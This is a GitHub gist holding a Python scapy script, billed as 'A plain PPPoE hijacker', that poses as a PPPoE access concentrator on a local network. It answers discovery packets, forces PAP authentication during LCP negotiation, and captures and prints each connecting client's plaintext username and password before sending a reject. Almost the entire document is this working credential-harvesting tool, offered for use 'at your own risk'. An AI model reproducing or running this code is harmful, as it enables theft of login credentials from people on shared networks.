Skip to content

Instantly share code, notes, and snippets.

@tearfulDalvik
Last active January 10, 2021 15:04
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tearfulDalvik/a2064e4472b30ed299c43d830a0c05ea to your computer and use it in GitHub Desktop.
Save tearfulDalvik/a2064e4472b30ed299c43d830a0c05ea to your computer and use it in GitHub Desktop.
A plain PPPoE hijacker | NetKeeper Groper
# coding:utf-8
'''
@author Gufeng Shen
@date 2018年10月27日
'''
import struct
import os
import uuid
import copy
from scapy.all import *
from scapy.layers.ppp import *
import pprint
MAC_ADDRESS = "0a:0a:0a:0a:0a:0a"
INTERFACE = "en1"
# Magic number in PPP is used for checking loop
MAGIC_NUMBER = 0xf067acef
# DO NOT MODIFY THIS PLZ
AC_NAME = b"\x01\x02\x00\x10\x44\x41\x4C\x56\x49\x4B\x2D\x4B\x59\x58"
DEBUG = True
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class PPPoEServer(object):
def __init__(self):
# 用于处理回应不及时造成的 Loop
self.clientMap = {}
def start(self):
sniff(lfilter=self.filterData, iface=INTERFACE)
# 过滤并处理 pppoe 数据
def filterData(self, raw):
if hasattr(raw, "type"):
_type2Method = {
# 发现阶段
0x8863: {
"code": {
#PADI
0x09: (self.send_pado_packet),
#PADR
0x19: (self.send_pads_packet)
}
},
# 会话阶段
0x8864:{
"proto":{
# LCP 链路处理
0xc021:(self.process_lcp_req),
# PAP 协议处理
0xc023:(self.get_papinfo)
}
}
}
if raw.type in _type2Method:
_nMethod = _type2Method[raw.type]
for k, v in _nMethod.items():
# _nVal 为包中的 code 或 proto
_nVal = getattr(raw, k)
if _nVal in _nMethod[k]:
_nObj = _nMethod[k][_nVal]
_nObj(raw)
# 发送lcp-config-ack回执包
def send_lcp_ack_packet(self, raw):
raw = copy.deepcopy(raw)
raw.dst, raw.src = raw.src, raw.dst
raw[2].code = 0x02
self.print_raw(raw)
sendp(raw, iface=INTERFACE)
_mLastUser = "Unknown"
def get_papinfo(self, raw):
# pap-req
if raw[3].code == 0x1:
print("\n\nObtaining Username and Password")
os.system('clear')
_userName = raw[3].username
_passWord = raw[3].password
print(bcolors.WARNING)
print("\
___ _ _ _ __ _ \n\
/ \\__ _| |_ ___) | __ / _\\ |__ ___ _ __ \n\
/ /\\ / _` | \\ \\ / / | |/ / \\ \\| '_ \\ / _ \\ '_ \\ \n\
/ /_// (_| | |\\ V /| | < _\\ \\ | | | __/ | | |\n\
/___,' \\__,_|_| \\_/ |_|_|\\_\\ \\__/_| |_|\\___|_| |_|\n\
")
print(bcolors.OKBLUE)
print("Everything reporting at Great!" + bcolors.OKGREEN + "\n\nUsername:\n%s\nPassword:\n%s" % (_userName, _passWord))
print(bcolors.OKBLUE + "\nLast Username:\n", end='')
print(self._mLastUser)
print(bcolors.ENDC)
self.send_pap_authreject(raw)
if raw.src in self.clientMap:
del self.clientMap[raw.src]
self._mLastUser = _userName
print("Done")
# 发送pap拒绝验证
def send_pap_authreject(self, raw):
print("Sending Reject Packet")
raw.dst, raw.src = raw.src, raw.dst
raw[3] = PPP_PAP_Response()
raw[3].code = 0x3
raw[3].message = "lol"
self.print_raw(raw)
sendp(raw, iface=INTERFACE)
# 发送lcp-config-req回执包
def send_lcp_req_packet(self, raw):
raw = copy.deepcopy(raw)
raw.dst, raw.src = raw.src, raw.dst
_uMagicNumber = PPP_LCP_Magic_Number_Option()
_uMagicNumber.magic_number = MAGIC_NUMBER
_uAuthProtocol = PPP_LCP_Auth_Protocol_Option()
_uAuthProtocol.type = 0x3
_uAuthProtocol.len = 4
_uAuthProtocol.auth_protocol = 0xc023
_uOptions = raw[3].options
_uOptions[1] = _uAuthProtocol
_uOptions.append(_uMagicNumber)
raw[3].id = 0x2
del(raw[3].len, raw[2].len, raw[1].len)
self.printInfo("\n6. Sending Configuration Request")
self.print_raw(raw)
sendp(raw, iface=INTERFACE)
# 处理lcp-req请求
def process_lcp_req(self,raw):
# 判断是否是客户端传来的 Request
# PPP_LCP_Configure 在第三层
if raw[3].code == 0x05:
print(bcolors.FAIL)
print("Session Ended with sessionid: %d and reason: %s" % (raw[1].sessionid, raw[3].data))
print(bcolors.HEADER)
print("Waiting for next session")
print(bcolors.ENDC)
# exit()
elif raw[3].code == 0x01 and raw[3].id == 0x01:
self.print_raw(raw)
if raw.src not in self.clientMap:
self.printInfo("5. Configuration Request Received\n")
# Configuration Request
self.send_lcp_req_packet(raw)
self.printInfo("\n\n7. Sending Configuration Request Ack")
# Configuration Ack
self.send_lcp_ack_packet(raw)
self.clientMap[raw.src] = "Ack"
elif self.clientMap[raw.src] == "Ack":
print(bcolors.BOLD + "\rLoopback detected, will ignore next Request." + bcolors.ENDC)
del(self.clientMap[raw.src])
def print_raw(self, packet):
time.sleep(.1)
if DEBUG:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(packet)
# 发送pa*系列包格式
def send_pa_packet(self, raw, **kwargs):
raw.src, raw.dst = MAC_ADDRESS, raw.src
# 寻找客户端的 Host_Uniq
_host_Uniq = self.padi_find_hostuniq(raw.load)
# Service-Name
_payload = b"\x01\x01\x00\x00"
if _host_Uniq:
_payload += _host_Uniq
# AC-Name
_payload += AC_NAME
raw.len = len(_payload)
raw.load = _payload
for k, v in kwargs.items():
setattr(raw, k, v)
self.print_raw(raw)
sendp(raw, iface=INTERFACE)
# 发送 PADS 回执包
def send_pads_packet(self, raw):
if raw.src not in self.clientMap:
self.printInfo("3. Active Discovery Request Received")
self.printInfo("4. Sending PADS")
self.clientMap[raw.src] = "PADR"
return self.send_pa_packet(raw, code=0x65, sessionid=0x6a60)
elif self.clientMap[raw.src] == "PADR":
print(bcolors.BOLD, "\rLoopback detected, will ignore next PADR.", bcolors.ENDC)
del(self.clientMap[raw.src])
# 发送 PADO 回执包
def send_pado_packet(self, raw):
self.printInfo("\r1. Active Discovery Initiation Received")
self.printInfo("2. Sending PADO")
return self.send_pa_packet(raw, code=0x07)
def printInfo(self, str):
print(bcolors.WARNING, str, bcolors.ENDC)
# 寻找客户端发送的 Host-Uniq
def padi_find_hostuniq(self, raw):
_key = b"\x01\x03"
if _key in raw:
_nIdx = raw.index(_key)
# 2 字节 host-uniq 长度
_nLen = struct.unpack("!H", raw[_nIdx + 2:_nIdx + 4])[0]
# 2 字节长度+剩余字节
_nData = raw[_nIdx + 2:_nIdx + 4 + _nLen]
return _key + _nData
return
os.system("ifconfig")
print(bcolors.HEADER + "Select an interface: " + bcolors.ENDC)
INTERFACE = input()
iface = os.popen("ifconfig %s ether" % INTERFACE).readlines()
print("Now loading...", end='')
if len(iface) <= 0:
print(bcolors.FAIL, "\rInvalid interface", bcolors.ENDC)
exit()
n = PPPoEServer()
i = 0;
for params in iface:
if "ether" in params:
MAC_ADDRESS = iface[i][7:len(iface[1]) - 2]
break
i = i + 1
print("\r© 2018 Dalvik Shen\nA PPPoE injector, use at your own risk.\n\n")
print("Your MAC Address is %s\nWaiting for the next conntection..." % MAC_ADDRESS, end = '')
n.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment